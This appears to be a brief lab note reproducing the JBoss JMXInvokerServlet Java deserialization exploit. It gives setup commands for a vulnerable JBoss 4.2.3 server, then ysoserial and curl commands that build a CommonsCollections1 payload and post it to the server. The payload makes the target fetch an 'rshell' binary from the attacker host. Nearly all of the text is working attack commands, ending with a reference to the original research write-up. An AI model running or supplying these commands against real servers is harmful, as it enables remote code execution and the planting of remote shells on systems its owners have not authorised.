Server - 192.168.1.1
#wget -O jboss-4.2.3.zip http://sourceforge.net/projects/jboss/files/JBoss/JBoss-4.2.3.GA/jboss-4.2.3.GA-jdk6.zip/download#unzip jboss-4.2.3.zip#mv jboss-4.2.3.GA /usr/local/share/jboss#adduser appserver#chown -R appserver /usr/local/share/jboss#su -l appserver$cd /usr/local/share/jboss/bin$./run.sh -b 0.0.0.0
Client - 192.168.1.2
#wget https://github.com/frohoff/ysoserial/releases/download/v0.0.2/ysoserial-0.0.2-all.jar#java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'wget -O /tmp/rshell http://192.168.1.2/rshell' > /tmp/payload#curl --header 'Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue' --data-binary '@/tmp/payload' http://192.168.1.1:8080/invoker/JMXInvokerServlet
References
http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/